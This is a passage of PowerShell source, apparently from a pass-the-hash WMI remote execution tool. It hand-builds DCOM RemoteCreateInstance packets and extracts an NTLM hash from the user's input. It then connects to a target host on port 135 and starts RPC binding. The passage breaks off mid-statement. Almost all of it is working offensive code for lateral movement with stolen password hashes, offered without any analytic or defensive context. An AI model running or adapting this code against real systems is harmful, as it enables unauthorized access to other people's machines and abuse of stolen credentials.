$packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMVersionMajor",[Byte[]](0x05,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMVersionMinor",[Byte[]](0x07,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMFlags",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMReserved",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMCausalityID",$packet_causality_ID) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_Unknown",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_Unknown2",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_Unknown3",[Byte[]](0x00,0x00,0x02,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_Unknown4",$packet_cntdata) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCntData",$packet_cntdata) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesOBJREFSignature",[Byte[]](0x4d,0x45,0x4f,0x57)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesOBJREFFlags",[Byte[]](0x04,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesOBJREFIID",[Byte[]](0xa2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFCLSID",[Byte[]](0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFCBExtension",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFSize",$packet_size) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesTotalSize",$packet_total_size) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesReserved",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderPrivateHeader",[Byte[]](0xb0,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderTotalSize",$packet_total_size) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderCustomHeaderSize",[Byte[]](0xc0,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderReserved",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesDestinationContext",[Byte[]](0x02,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesNumActivationPropertyStructs",[Byte[]](0x06,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsInfoClsid",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrReferentID",[Byte[]](0x00,0x00,0x02,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrReferentID",[Byte[]](0x04,0x00,0x02,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesNULLPointer",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrMaxCount",[Byte[]](0x06,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid",[Byte[]](0xb9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid2",[Byte[]](0xab,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid3",[Byte[]](0xa5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid4",[Byte[]](0xa6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid5",[Byte[]](0xa4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid6",[Byte[]](0xaa,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrMaxCount",[Byte[]](0x06,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize",[Byte[]](0x68,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize2",[Byte[]](0x58,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize3",[Byte[]](0x90,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize4",$packet_property_data_size) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize5",[Byte[]](0x20,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize6",[Byte[]](0x30,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPrivateHeader",[Byte[]](0x58,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesSessionID",[Byte[]](0xff,0xff,0xff,0xff)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesRemoteThisSessionID",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesClientImpersonating",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPartitionIDPresent",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesDefaultAuthnLevel",[Byte[]](0x02,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPartitionGuid",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesProcessRequestFlags",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesOriginalClassContext",[Byte[]](0x14,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesFlags",[Byte[]](0x02,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesReserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesUnusedBuffer",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoPrivateHeader",[Byte[]](0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInstantiatedObjectClsId",[Byte[]](0x5e,0xf0,0xc3,0x8b,0x6b,0xd8,0xd0,0x11,0xa0,0x75,0x00,0xc0,0x4f,0xb6,0x88,0x20)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoClassContext",[Byte[]](0x14,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoActivationFlags",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoFlagsSurrogate",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInterfaceIdCount",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInstantiationFlag",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsPtr",[Byte[]](0x00,0x00,0x02,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationEntirePropertySize",[Byte[]](0x58,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationVersionMajor",[Byte[]](0x05,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationVersionMinor",[Byte[]](0x07,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsPtrMaxCount",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIds",[Byte[]](0x18,0xad,0x09,0xf3,0x6a,0xd8,0xd0,0x11,0xa0,0x75,0x00,0xc0,0x4f,0xb6,0x88,0x20)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsUnusedBuffer",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoPrivateHeader",[Byte[]](0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientOk",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved2",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved3",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrReferentID",[Byte[]](0x00,0x00,0x02,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoNULLPtr",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextUnknown",[Byte[]](0x60,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextCntData",[Byte[]](0x60,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFSignature",[Byte[]](0x4d,0x45,0x4f,0x57)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFFlags",[Byte[]](0x04,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFIID",[Byte[]](0xc0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFCLSID",[Byte[]](0x3b,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFCBExtension",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFSize",[Byte[]](0x30,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoUnusedBuffer",[Byte[]](0x01,0x00,0x01,0x00,0x63,0x2c,0x80,0x2a,0xa5,0xd2,0xaf,0xdd,0x4d,0xc4,0xbb,0x37,0x4d,0x37,0x76,0xd7,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoPrivateHeader",$packet_private_header) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoAuthenticationFlags",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoPtrReferentID",[Byte[]](0x00,0x00,0x02,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoNULLPtr",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoReserved",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameReferentID",[Byte[]](0x04,0x00,0x02,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNULLPtr",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoReserved2",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameMaxCount",$packet_target_length) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameOffset",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameActualCount",$packet_target_length) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameString",$packet_target_unicode) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoPrivateHeader",[Byte[]](0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoNULLPtr",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoProcessID",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoApartmentID",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoContextID",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoPrivateHeader",[Byte[]](0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoNULLPtr",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrReferentID",[Byte[]](0x00,0x00,0x02,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestClientImpersonationLevel",[Byte[]](0x02,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestNumProtocolSequences",[Byte[]](0x01,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestUnknown",[Byte[]](0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrReferentID",[Byte[]](0x04,0x00,0x02,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrMaxCount",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrProtocolSeq",[Byte[]](0x07,0x00)) + $packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoUnusedBuffer",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00)) + + return $packet_DCOMRemoteCreateInstance +} + +function DataLength2 +{ + param ([Int]$length_start,[Byte[]]$string_extract_data) + + $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0) + + return $string_length +} + +if($hash -like "*:*") +{ + $hash = $hash.SubString(($hash.IndexOf(":") + 1),32) +} + +if($Domain) +{ + $output_username = $Domain + "\" + $Username +} +else +{ + $output_username = $Username +} + +if($Target -eq 'localhost') +{ + $Target = "127.0.0.1" +} + +try +{ + $target_type = [IPAddress]$Target + $target_short = $target_long = $Target +} +catch +{ + $target_long = $Target + + if($Target -like "*.*") + { + $target_short_index = $Target.IndexOf(".") + $target_short = $Target.Substring(0,$target_short_index) + } + else + { + $target_short = $Target + } + +} + +$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id +$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) +$process_ID = $process_ID -replace "-00-00","" +[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} +Write-Verbose "Connecting to $Target`:135" +$WMI_client_init = New-Object System.Net.Sockets.TCPClient +$WMI_client_init.Client.ReceiveTimeout = 30000 + +try +{ + $WMI_client_init.Connect($Target,"135") +} +catch +{ + Write-Output "$Target did not respond" +} + +if($WMI_client_init.Connected) +{ + $WMI_client_stream_init = $WMI_client_init.GetStream() + $WMI_client_receive = New-Object System.Byte[] 2048 + $RPC_UUID = 0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a + $packet_RPC = Get-PacketRPCBind 2 0xd0,0x16 0x02 0x00,0x00 $RPC_UUID 0x00,0x00 + $packet_RPC["RPCBind_FragLength"] = 0x74,0x00 + $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC + $WMI_client_send = $RPC + $WMI_client_stream_init.Write($WMI_client_send,0,$WMI_client_send.Length) > $null + $WMI_client_stream_init.Flush() + $WMI_client_stream_init.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null + $assoc_group = $WMI_client_receive[20..23] + $packet_RPC = Get-PacketRPCRequest 0x03 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x05,0x00 + $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC + $WMI_client_send = $RPC + $WMI_client_stream_init.Write($WMI_client_send,0,$WMI_client_send.Length) > $null + $WMI_client_stream_init.Flush() + $WMI_client_stream_init.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null + $WMI_hostname_unicode = $WMI_client_receive[42..$WMI_client_receive.Length] + $WMI_hostname = [System.BitConverter]::ToString($WMI_hostname_unicode) + $WMI_hostname_index = $WMI_hostname.IndexOf("-00-00-00") + $WMI_hostname = $WMI_hostname.SubString(0,$WMI_hostname_index) + $WMI_hostname = $WMI_hostname -replace "-00","" + $WMI_hostname = $WMI_hostname.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $WMI_hostname = New-Object System.String ($WMI_hostname,0,$WMI_hostname.Length) + + if($target_short -cne $WMI_hostname) + { + Write-Verbose "WMI reports 